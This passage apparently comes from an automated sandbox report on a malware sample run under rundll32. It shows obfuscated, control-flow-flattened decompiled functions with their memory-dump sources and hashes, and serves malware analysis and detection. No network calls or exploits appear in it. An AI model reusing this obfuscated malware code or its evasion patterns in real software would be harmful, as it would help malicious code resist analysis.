                                                                                                                      				_v16 = _v16 ^ 0x05eb1b3e;
                                                                                                                      				_v20 = 0xcf26b;
                                                                                                                      				_v20 = _v20 | 0xbebffeb7;
                                                                                                                      				_v20 = _v20 ^ 0xbebf7f31;
                                                                                                                      				_v60 = 0x60d0b7;
                                                                                                                      				_v60 = _v60 >> 2;
                                                                                                                      				_v60 = _v60 ^ 0x0017c790;
                                                                                                                      				_v40 = 0xb2c22;
                                                                                                                      				_v40 = _v40 ^ 0x2c2f8cde;
                                                                                                                      				_v40 = _v40 + 0xffffbcf4;
                                                                                                                      				_v40 = _v40 ^ 0x2c2f98f1;
                                                                                                                      				_v36 = 0x14b711;
                                                                                                                      				_v36 = _v36 >> 0xd;
                                                                                                                      				_v36 = _v36 | 0x6b3fd2c1;
                                                                                                                      				_v36 = _v36 ^ 0x6b3a1312;
                                                                                                                      				while(1) {
                                                                                                                      					_t160 =  *_t159;
                                                                                                                      					if(_t160 == 0) {
                                                                                                                      						break;
                                                                                                                      					}
                                                                                                                      					if( *((intOrPtr*)(_t160 + 0x30)) == 0) {
                                                                                                                      						L4:
                                                                                                                      						 *_t159 =  *_t160;
                                                                                                                      						_t133 = E001768DE(_v20, _v60, _v40, _v36, _t160);
                                                                                                                      						_t161 = _t161 + 0xc;
                                                                                                                      					} else {
                                                                                                                      						_t133 = E00175E0B( *((intOrPtr*)(_t160 + 0x24)), _t137, _v28, _v24);
                                                                                                                      						if(_t133 != _v8) {
                                                                                                                      							_t159 = _t160;
                                                                                                                      						} else {
                                                                                                                      							 *((intOrPtr*)(_t160 + 0xc))( *((intOrPtr*)(_t160 + 0x30)), 0, 0);
                                                                                                                      							E0017F88A(_v44, _v32, _v12,  *((intOrPtr*)(_t160 + 0x30)));
                                                                                                                      							E00184DAD(_v56, _v52,  *((intOrPtr*)(_t160 + 0x24)), _v48, _v16);
                                                                                                                      							_t161 = _t161 + 0x14;
                                                                                                                      							goto L4;
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      				return _t133;
                                                                                                                      			}

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: =p5$?.$UGX
                                                                                                                      • API String ID: 0-1320111276
                                                                                                                      • Opcode ID: 2db516d4d64a02e0246918ecf0dc254d85751fbfdfea19104cfcff6ea366f0c9
                                                                                                                      • Instruction ID: bd9d8cc3b5a5a3c017c2df36b71427ad7560517af483c252fabe083878e088ef
                                                                                                                      • Opcode Fuzzy Hash: 2db516d4d64a02e0246918ecf0dc254d85751fbfdfea19104cfcff6ea366f0c9
                                                                                                                      • Instruction Fuzzy Hash: FD512072D01709EBCB58CFA4D98A9DEBFB2FB58328F208059D506B6260D7B51A45CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0017C850(intOrPtr* __ecx) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				intOrPtr _v68;
                                                                                                                      				char _v328;
                                                                                                                      				char _t126;
                                                                                                                      				void* _t128;
                                                                                                                      				signed int _t129;
                                                                                                                      				void* _t133;
                                                                                                                      				signed int _t135;
                                                                                                                      				signed int _t136;
                                                                                                                      				char* _t137;
                                                                                                                      				intOrPtr* _t154;
                                                                                                                      
                                                                                                                      				_v64 = _v64 & 0x00000000;
                                                                                                                      				_v60 = _v60 & 0x00000000;
                                                                                                                      				_v68 = 0xeb7817;
                                                                                                                      				_v44 = 0x4dbb17;
                                                                                                                      				_v44 = _v44 >> 3;
                                                                                                                      				_v44 = _v44 ^ 0x000af917;
                                                                                                                      				_v12 = 0xca90c;
                                                                                                                      				_v12 = _v12 >> 0xf;
                                                                                                                      				_v12 = _v12 >> 0xe;
                                                                                                                      				_v12 = _v12 | 0x67e1d035;
                                                                                                                      				_v12 = _v12 ^ 0x67ebacbe;
                                                                                                                      				_v32 = 0xdd0ad5;
                                                                                                                      				_v32 = _v32 >> 6;
                                                                                                                      				_v32 = _v32 >> 0xc;
                                                                                                                      				_v32 = _v32 ^ 0x00040440;
                                                                                                                      				_v16 = 0xaefc2a;
                                                                                                                      				_v16 = _v16 ^ 0x05a88ae0;
                                                                                                                      				_t154 = __ecx;
                                                                                                                      				_t135 = 0x4a;
                                                                                                                      				_v16 = _v16 / _t135;
                                                                                                                      				_v16 = _v16 | 0x6472a2d9;
                                                                                                                      				_v16 = _v16 ^ 0x647c73c3;
                                                                                                                      				_v8 = 0x7aea22;
                                                                                                                      				_t136 = 0x5f;
                                                                                                                      				_v8 = _v8 * 0x1d;
                                                                                                                      				_v8 = _v8 >> 0xa;
                                                                                                                      				_v8 = _v8 >> 7;
                                                                                                                      				_v8 = _v8 ^ 0x0003680c;
                                                                                                                      				_v28 = 0xd7a14b;
                                                                                                                      				_v28 = _v28 >> 1;
                                                                                                                      				_v28 = _v28 | 0x0e275eed;
                                                                                                                      				_v28 = _v28 ^ 0x0e6be1b9;
                                                                                                                      				_v56 = 0x693eb0;
                                                                                                                      				_t137 =  &_v328;
                                                                                                                      				_v56 = _v56 / _t136;
                                                                                                                      				_v56 = _v56 ^ 0x00052716;
                                                                                                                      				_v52 = 0x6599ea;
                                                                                                                      				_v52 = _v52 << 8;
                                                                                                                      				_v52 = _v52 ^ 0x659cef3f;
                                                                                                                      				_v36 = 0xaf3092;
                                                                                                                      				_v36 = _v36 + 0xffffd3bf;
                                                                                                                      				_v36 = _v36 ^ 0x419856f6;
                                                                                                                      				_v36 = _v36 ^ 0x413f6f4c;
                                                                                                                      				_v40 = 0x56314e;
                                                                                                                      				_v40 = _v40 ^ 0x0d0339a4;
                                                                                                                      				_v40 = _v40 >> 5;
                                                                                                                      				_v40 = _v40 ^ 0x0068e9be;
                                                                                                                      				_v20 = 0xd689b7;
                                                                                                                      				_v20 = _v20 >> 1;
                                                                                                                      				_v20 = _v20 + 0x3668;
                                                                                                                      				_v20 = _v20 ^ 0x006dcd8c;
                                                                                                                      				_v24 = 0x36edf6;
                                                                                                                      				_v24 = _v24 + 0x231d;
                                                                                                                      				_v24 = _v24 ^ 0xb40b6ffd;
                                                                                                                      				_v24 = _v24 ^ 0xb434c03a;
                                                                                                                      				_v48 = 0x867594;
                                                                                                                      				_v48 = _v48 * 0x3a;
                                                                                                                      				_v48 = _v48 ^ 0x1e7cd6f5;
                                                                                                                      				while(1) {
                                                                                                                      					_t126 =  *_t154;
                                                                                                                      					if(_t126 == 0) {
                                                                                                                      						break;
                                                                                                                      					}
                                                                                                                      					if(_t126 == 0x2e) {
                                                                                                                      						 *_t137 = 0;
                                                                                                                      					} else {
                                                                                                                      						 *_t137 = _t126;
                                                                                                                      						_t137 = _t137 + 1;
                                                                                                                      						_t154 = _t154 + 1;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					L6:
                                                                                                                      					_t128 = E001859B7(_v44, _v12,  &_v328, _v32);
                                                                                                                      					_t155 = _t128;
                                                                                                                      					if(_t128 != 0) {
                                                                                                                      						L8:
                                                                                                                      						_t129 = E0018FE5E(_v56, _t154 + 1, _v52, _v36);
                                                                                                                      						_push(_v48);
                                                                                                                      						_push(_v24);
                                                                                                                      						_push(_v20);
                                                                                                                      						_push(_v40);
                                                                                                                      						return E0017F2C1(_t155, _t129 ^ 0x3e95e426);
                                                                                                                      					}
                                                                                                                      					_t133 = E0018F949(_v16, _v8,  &_v328, _v28);
                                                                                                                      					_t155 = _t133;
                                                                                                                      					if(_t133 != 0) {
                                                                                                                      						goto L8;
                                                                                                                      					}
                                                                                                                      					return _t133;
                                                                                                                      				}
                                                                                                                      				goto L6;
                                                                                                                      			}





























                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "z$Lo?A$N1V
                                                                                                                      • API String ID: 0-1513724126
                                                                                                                      • Opcode ID: 4560ea773100d6c33708da93f2f605071fff66f43b738e700dd77952ab7016f5
                                                                                                                      • Instruction ID: bd917bf32e1dfa64cbd5fadd74757b7fd48d42b711bd6c0bf7c68767c1d23581
                                                                                                                      • Opcode Fuzzy Hash: 4560ea773100d6c33708da93f2f605071fff66f43b738e700dd77952ab7016f5
                                                                                                                      • Instruction Fuzzy Hash: 10513272C0121EEBCF09CFA5D94A6EEFBB1FB54318F208159D511B6260D7B50A09CF95
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 68%
                                                                                                                      			E0017B821() {
                                                                                                                      				signed int _v4;
                                                                                                                      				unsigned int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				intOrPtr _t108;
                                                                                                                      				intOrPtr _t111;
                                                                                                                      				signed int _t113;
                                                                                                                      				signed int _t114;
                                                                                                                      				signed int _t115;
                                                                                                                      				intOrPtr* _t116;
                                                                                                                      				void* _t117;
                                                                                                                      				void* _t129;
                                                                                                                      				signed int* _t131;
                                                                                                                      
                                                                                                                      				_t131 =  &_v40;
                                                                                                                      				_v8 = 0x113b84;
                                                                                                                      				_v8 = _v8 >> 5;
                                                                                                                      				_v8 = _v8 ^ 0x00044f92;
                                                                                                                      				_v36 = 0x188bc5;
                                                                                                                      				_v36 = _v36 * 0x48;
                                                                                                                      				_v36 = _v36 + 0xffff17a0;
                                                                                                                      				_t129 = 0x184d0e0;
                                                                                                                      				_v36 = _v36 << 0xf;
                                                                                                                      				_v36 = _v36 ^ 0x33821a89;
                                                                                                                      				_v28 = 0x501440;
                                                                                                                      				_v28 = _v28 + 0x91aa;
                                                                                                                      				_v28 = _v28 ^ 0x04b9c112;
                                                                                                                      				_v28 = _v28 ^ 0x04ea9889;
                                                                                                                      				_v32 = 0xb3d9a7;
                                                                                                                      				_t113 = 0x1d;
                                                                                                                      				_v32 = _v32 * 0x13;
                                                                                                                      				_v32 = _v32 * 0x6a;
                                                                                                                      				_v32 = _v32 ^ 0x86e7717c;
                                                                                                                      				_v40 = 0x7a3277;
                                                                                                                      				_t30 =  &_v40; // 0x7a3277
                                                                                                                      				_v40 =  *_t30 * 0x26;
                                                                                                                      				_v40 = _v40 + 0x92c7;
                                                                                                                      				_v40 = _v40 << 6;
                                                                                                                      				_v40 = _v40 ^ 0x89042107;
                                                                                                                      				_v12 = 0xe6e512;
                                                                                                                      				_v12 = _v12 / _t113;
                                                                                                                      				_v12 = _v12 ^ 0x0000e0e8;
                                                                                                                      				_v16 = 0xf852d4;
                                                                                                                      				_t114 = 0x7e;
                                                                                                                      				_v16 = _v16 / _t114;
                                                                                                                      				_v16 = _v16 ^ 0x2a7b237e;
                                                                                                                      				_v16 = _v16 ^ 0x2a71b8af;
                                                                                                                      				_v20 = 0xa37a15;
                                                                                                                      				_v20 = _v20 + 0xffff21a5;
                                                                                                                      				_v20 = _v20 >> 0xb;
                                                                                                                      				_v20 = _v20 ^ 0x000b71fe;
                                                                                                                      				_v4 = 0x3aba4b;
                                                                                                                      				_v4 = _v4 ^ 0x2eee7843;
                                                                                                                      				_v4 = _v4 ^ 0x2ed9fad0;
                                                                                                                      				_v24 = 0x4dcf39;
                                                                                                                      				_t115 = 0x4a;
                                                                                                                      				_v24 = _v24 / _t115;
                                                                                                                      				_v24 = _v24 << 0xe;
                                                                                                                      				_v24 = _v24 ^ 0x434ce119;
                                                                                                                      				_t116 =  *0x195208; // 0x0
                                                                                                                      				do {
                                                                                                                      					while(_t129 != 0x184d0e0) {
                                                                                                                      						if(_t129 == 0x7e35d81) {
                                                                                                                      							_t108 = E00184EFF(E001899AA, _v16, _t116, _t116, _v20, _v4, _t116, _v24, 0);
                                                                                                                      							_t116 =  *0x195208; // 0x0
                                                                                                                      							 *((intOrPtr*)(_t116 + 0x14)) = _t108;
                                                                                                                      						} else {
                                                                                                                      							if(_t129 != 0xb90d6f1) {
                                                                                                                      								goto L6;
                                                                                                                      							} else {
                                                                                                                      								_push(_v12);
                                                                                                                      								_push(_v40);
                                                                                                                      								_t111 = E001811FC(_v32);
                                                                                                                      								_t116 =  *0x195208; // 0x0
                                                                                                                      								_t131 = _t131 - 0xc + 0x14;
                                                                                                                      								_t129 = 0x7e35d81;
                                                                                                                      								 *_t116 = _t111;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L9:
                                                                                                                      						return 0 | _t116 != 0x00000000;
                                                                                                                      					}
                                                                                                                      					_push(_t116);
                                                                                                                      					_push(_t116);
                                                                                                                      					_t117 = 0x18;
                                                                                                                      					_t116 = E00183512(_t117);
                                                                                                                      					_t129 = 0xb90d6f1;
                                                                                                                      					 *0x195208 = _t116;
                                                                                                                      					L6:
                                                                                                                      				} while (_t129 != 0x93e05db);
                                                                                                                      				goto L9;
                                                                                                                      			}






















                                                                                                                      0x0017b92e
                                                                                                                      0x0017b936
                                                                                                                      0x0017b93b
                                                                                                                      0x0017b943
                                                                                                                      0x0017b94b
                                                                                                                      0x0017b953
                                                                                                                      0x0017b95b
                                                                                                                      0x0017b967
                                                                                                                      0x0017b96a
                                                                                                                      0x0017b96e
                                                                                                                      0x0017b973
                                                                                                                      0x0017b97b
                                                                                                                      0x0017b981
                                                                                                                      0x0017b981
                                                                                                                      0x0017b987
                                                                                                                      0x0017b9f6
                                                                                                                      0x0017b9fb
                                                                                                                      0x0017ba04
                                                                                                                      0x0017b989
                                                                                                                      0x0017b98b
                                                                                                                      0x00000000
                                                                                                                      0x0017b98d
                                                                                                                      0x0017b98d
                                                                                                                      0x0017b991
                                                                                                                      0x0017b99c
                                                                                                                      0x0017b9a1
                                                                                                                      0x0017b9a7
                                                                                                                      0x0017b9aa
                                                                                                                      0x0017b9ac
                                                                                                                      0x00000000
                                                                                                                      0x0017b9ac
                                                                                                                      0x0017b98b
                                                                                                                      0x0017ba08
                                                                                                                      0x0017ba15
                                                                                                                      0x0017ba15
                                                                                                                      0x0017b9bc
                                                                                                                      0x0017b9bd
                                                                                                                      0x0017b9c0
                                                                                                                      0x0017b9c8
                                                                                                                      0x0017b9ca
                                                                                                                      0x0017b9cc
                                                                                                                      0x0017b9d2
                                                                                                                      0x0017b9d2
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Cx.$w2z$~#{*
                                                                                                                      • API String ID: 0-3781971293
                                                                                                                      • Opcode ID: d2f747e9dfa1f165f3d692b78e8f5621b7ba6b58217bdfd58ab2ddbc9ef0f924
                                                                                                                      • Instruction ID: ddb5ae296642c975701cdf5231c0f13cc611111b8d0465ec18459b3016c4ae73
                                                                                                                      • Opcode Fuzzy Hash: d2f747e9dfa1f165f3d692b78e8f5621b7ba6b58217bdfd58ab2ddbc9ef0f924
                                                                                                                      • Instruction Fuzzy Hash: 195189B150D3019FC308DF25E88A50BBBE2FBC8758F008A1DF599A6260D371DA498F87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E001744FA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				char _v520;
                                                                                                                      				char _v552;
                                                                                                                      				signed int _v556;
                                                                                                                      				signed int _v560;
                                                                                                                      				signed int _v564;
                                                                                                                      				signed int _v568;
                                                                                                                      				signed int _v572;
                                                                                                                      				signed int _v576;
                                                                                                                      				signed int _v580;
                                                                                                                      				signed int _v584;
                                                                                                                      				signed int _v588;
                                                                                                                      				signed int _v592;
                                                                                                                      				signed int _v596;
                                                                                                                      				void* _t110;
                                                                                                                      				signed int _t116;
                                                                                                                      				signed int _t120;
                                                                                                                      				void* _t126;
                                                                                                                      				signed int _t135;
                                                                                                                      				signed int _t136;
                                                                                                                      				void* _t138;
                                                                                                                      				signed int* _t141;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_t138 = __ecx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0017CF25(_t110);
                                                                                                                      				_v584 = 0x353aee;
                                                                                                                      				_t141 =  &(( &_v596)[5]);
                                                                                                                      				_t126 = 0x2b8a3ea;
                                                                                                                      				_t135 = 0x6c;
                                                                                                                      				_v584 = _v584 * 0x28;
                                                                                                                      				_v584 = _v584 | 0xfff7ffbb;
                                                                                                                      				_v584 = _v584 ^ 0xfff7ffab;
                                                                                                                      				_v560 = 0x47639d;
                                                                                                                      				_v560 = _v560 + 0xffffee4d;
                                                                                                                      				_v560 = _v560 ^ 0x00482f45;
                                                                                                                      				_v568 = 0x9954f4;
                                                                                                                      				_v568 = _v568 >> 4;
                                                                                                                      				_v568 = _v568 << 0xe;
                                                                                                                      				_v568 = _v568 ^ 0x655e48ca;
                                                                                                                      				_v572 = 0x27eb8;
                                                                                                                      				_v572 = _v572 << 0xf;
                                                                                                                      				_v572 = _v572 | 0x08d3f6f7;
                                                                                                                      				_v572 = _v572 ^ 0x4e414fab;
                                                                                                                      				_v572 = _v572 ^ 0x7197c1a5;
                                                                                                                      				_v592 = 0xd88b27;
                                                                                                                      				_v592 = _v592 | 0xcb2a0632;
                                                                                                                      				_v592 = _v592 ^ 0x61d9313a;
                                                                                                                      				_v592 = _v592 * 0x31;
                                                                                                                      				_v592 = _v592 ^ 0x90d0f268;
                                                                                                                      				_v564 = 0x1e6f95;
                                                                                                                      				_v564 = _v564 + 0xffffd458;
                                                                                                                      				_v564 = _v564 ^ 0x0016c965;
                                                                                                                      				_v556 = 0x7ec301;
                                                                                                                      				_v556 = _v556 / _t135;
                                                                                                                      				_v556 = _v556 ^ 0x0008e3f1;
                                                                                                                      				_v576 = 0xe82a72;
                                                                                                                      				_v576 = _v576 >> 7;
                                                                                                                      				_t116 = _v576;
                                                                                                                      				_t136 = 0x3f;
                                                                                                                      				_t134 = _t116 % _t136;
                                                                                                                      				_v576 = _t116 / _t136;
                                                                                                                      				_v576 = _v576 * 0x66;
                                                                                                                      				_v576 = _v576 ^ 0x00094998;
                                                                                                                      				_v596 = 0x9d9cf;
                                                                                                                      				_v596 = _v596 + 0xffff3374;
                                                                                                                      				_v596 = _v596 ^ 0xdf943dc0;
                                                                                                                      				_v596 = _v596 ^ 0x9d51af04;
                                                                                                                      				_v596 = _v596 ^ 0x42c0e9a6;
                                                                                                                      				_v580 = 0x1688bd;
                                                                                                                      				_v580 = _v580 >> 0xa;
                                                                                                                      				_v580 = _v580 + 0xf36b;
                                                                                                                      				_v580 = _v580 * 0x11;
                                                                                                                      				_v580 = _v580 ^ 0x001dff3c;
                                                                                                                      				_v588 = 0xc39d29;
                                                                                                                      				_v588 = _v588 + 0xc15a;
                                                                                                                      				_t120 = _v588 * 0x65;
                                                                                                                      				_v588 = _t120;
                                                                                                                      				_v588 = _v588 << 0x10;
                                                                                                                      				_v588 = _v588 ^ 0x49a37055;
                                                                                                                      				do {
                                                                                                                      					while(_t126 != 0x10fdd0e) {
                                                                                                                      						if(_t126 == 0x1b35a13) {
                                                                                                                      							return E00189045(_v596, _t134,  &_v520, _t138,  &_v552, _v580, _v588);
                                                                                                                      						}
                                                                                                                      						if(_t126 != 0x2b8a3ea) {
                                                                                                                      							goto L6;
                                                                                                                      						}
                                                                                                                      						_t134 =  &_v552;
                                                                                                                      						_t120 = E00191310(_v584,  &_v552, _v560, _v568, _v572, _v592);
                                                                                                                      						_t141 =  &(_t141[4]);
                                                                                                                      						_t126 = 0x10fdd0e;
                                                                                                                      					}
                                                                                                                      					_push(_t126);
                                                                                                                      					_t134 =  &_v520;
                                                                                                                      					_t120 = E0017AC8C(_v564,  &_v520, _v556, _v576);
                                                                                                                      					_t141 =  &(_t141[3]);
                                                                                                                      					_t126 = 0x1b35a13;
                                                                                                                      					L6:
                                                                                                                      				} while (_t126 != 0x712552c);
                                                                                                                      				return _t120;
                                                                                                                      			}
























                                                                                                                      0x001746af
                                                                                                                      0x001746b5
                                                                                                                      0x00000000
                                                                                                                      0x00174720
                                                                                                                      0x001746b9
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x001746bf
                                                                                                                      0x001746d3
                                                                                                                      0x001746d8
                                                                                                                      0x001746db
                                                                                                                      0x001746db
                                                                                                                      0x001746df
                                                                                                                      0x001746e4
                                                                                                                      0x001746f0
                                                                                                                      0x001746f5
                                                                                                                      0x001746f8
                                                                                                                      0x001746fa
                                                                                                                      0x001746fa
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: E/H$r*$:5
                                                                                                                      • API String ID: 0-3508030207
                                                                                                                      • Opcode ID: bdc7eb3c234c05e9e6cdbdc0e6f0d16dbbad6f054e1b81a557a4ca66bb56ad1d
                                                                                                                      • Instruction ID: 54fadbe24278c28767ab8aed583a9fbfcd30e8f1a03f9080ed3ee232713c7270
                                                                                                                      • Opcode Fuzzy Hash: bdc7eb3c234c05e9e6cdbdc0e6f0d16dbbad6f054e1b81a557a4ca66bb56ad1d
                                                                                                                      • Instruction Fuzzy Hash: CC5120714083429BC748DF21C98A81FBBF1BBD8758F505A1DF19AA6221D7B18A49CF86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0017AE9A() {
                                                                                                                      				signed char _v2;
                                                                                                                      				signed int _v276;
                                                                                                                      				signed int _v280;
                                                                                                                      				char _v284;
                                                                                                                      				signed short _v320;
                                                                                                                      				intOrPtr _v324;
                                                                                                                      				intOrPtr _v328;
                                                                                                                      				intOrPtr _v332;
                                                                                                                      				signed int _v336;
                                                                                                                      				signed int _v340;
                                                                                                                      				signed int _v344;
                                                                                                                      				signed int _v348;
                                                                                                                      				signed int _v352;
                                                                                                                      				signed int _v356;
                                                                                                                      				signed int _v360;
                                                                                                                      				signed int _v364;
                                                                                                                      				void* _t93;
                                                                                                                      				signed int _t105;
                                                                                                                      				signed int _t106;
                                                                                                                      				signed int _t107;
                                                                                                                      				intOrPtr _t109;
                                                                                                                      				signed int* _t111;
                                                                                                                      
                                                                                                                      				_t111 =  &_v364;
                                                                                                                      				_v332 = 0xbc8cfe;
                                                                                                                      				_t109 = 0;
                                                                                                                      				_t93 = 0x544b857;
                                                                                                                      				_v328 = 0;
                                                                                                                      				_v324 = 0;
                                                                                                                      				_v348 = 0xa18708;
                                                                                                                      				_v348 = _v348 | 0xdf6aec5f;
                                                                                                                      				_v348 = _v348 ^ 0xdfe83fdc;
                                                                                                                      				_v356 = 0xddc275;
                                                                                                                      				_v356 = _v356 + 0xef66;
                                                                                                                      				_t105 = 0x44;
                                                                                                                      				_v356 = _v356 / _t105;
                                                                                                                      				_v356 = _v356 ^ 0x000c07d0;
                                                                                                                      				_v360 = 0xb33a69;
                                                                                                                      				_v360 = _v360 + 0x311b;
                                                                                                                      				_v360 = _v360 + 0xffff8b8d;
                                                                                                                      				_v360 = _v360 ^ 0x00b7daa7;
                                                                                                                      				_v364 = 0x70c027;
                                                                                                                      				_t106 = 0x45;
                                                                                                                      				_v364 = _v364 / _t106;
                                                                                                                      				_v364 = _v364 >> 3;
                                                                                                                      				_t107 = 0x76;
                                                                                                                      				_v364 = _v364 / _t107;
                                                                                                                      				_v364 = _v364 ^ 0x00047190;
                                                                                                                      				_v340 = 0xefeeea;
                                                                                                                      				_v340 = _v340 >> 9;
                                                                                                                      				_v340 = _v340 ^ 0x00027f77;
                                                                                                                      				_v352 = 0xde5c51;
                                                                                                                      				_v352 = _v352 + 0xffff1c5e;
                                                                                                                      				_v352 = _v352 ^ 0x00dc38de;
                                                                                                                      				_v344 = 0x59a1b5;
                                                                                                                      				_v344 = _v344 + 0xf1eb;
                                                                                                                      				_v344 = _v344 ^ 0x005dc95d;
                                                                                                                      				_v336 = 0x74ce3f;
                                                                                                                      				_v336 = _v336 + 0xffffdac0;
                                                                                                                      				_v336 = _v336 ^ 0x0079bed4;
                                                                                                                      				do {
                                                                                                                      					while(_t93 != 0x136692) {
                                                                                                                      						if(_t93 == 0x147bc0f) {
                                                                                                                      							_t93 = 0xf967eb2;
                                                                                                                      							_t109 = _t109 + _v276 * 0x64;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t93 == 0x544b857) {
                                                                                                                      								_t93 = 0x136692;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t93 == 0x6e5561d) {
                                                                                                                      									_t93 = 0xde10965;
                                                                                                                      									_t109 = _t109 + (_v2 & 0x000000ff) * 0x186a0;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									if(_t93 == 0x9c7e626) {
                                                                                                                      										E00173D8A(_v340,  &_v320, _v352, _v344, _v336);
                                                                                                                      										_t111 =  &(_t111[3]);
                                                                                                                      										_t93 = 0x6e5561d;
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      										if(_t93 == 0xde10965) {
                                                                                                                      											_t93 = 0x147bc0f;
                                                                                                                      											_t109 = _t109 + _v280 * 0x3e8;
                                                                                                                      											continue;
                                                                                                                      										} else {
                                                                                                                      											if(_t93 != 0xf967eb2) {
                                                                                                                      												goto L16;
                                                                                                                      											} else {
                                                                                                                      												_t109 = _t109 + (_v320 & 0x0000ffff);
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L9:
                                                                                                                      						return _t109;
                                                                                                                      					}
                                                                                                                      					_v284 = 0x11c;
                                                                                                                      					E00185A5C( &_v284, _v348, _v356, _v360, _v364);
                                                                                                                      					_t111 =  &(_t111[3]);
                                                                                                                      					_t93 = 0x9c7e626;
                                                                                                                      					L16:
                                                                                                                      				} while (_t93 != 0xf3c44c2);
                                                                                                                      				goto L9;
                                                                                                                      			}


























                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: e$e$f
                                                                                                                      • API String ID: 0-1877623186
                                                                                                                      • Opcode ID: 3bc59c3c401371c9cdb65951a26b58042382158b88ab3837599062e84b37cfbd
                                                                                                                      • Instruction ID: 7ff9f14292b22148483bb31e00bf89dd9c44d19e3cf7a3268120ca4a9a137ca8
                                                                                                                      • Opcode Fuzzy Hash: 3bc59c3c401371c9cdb65951a26b58042382158b88ab3837599062e84b37cfbd
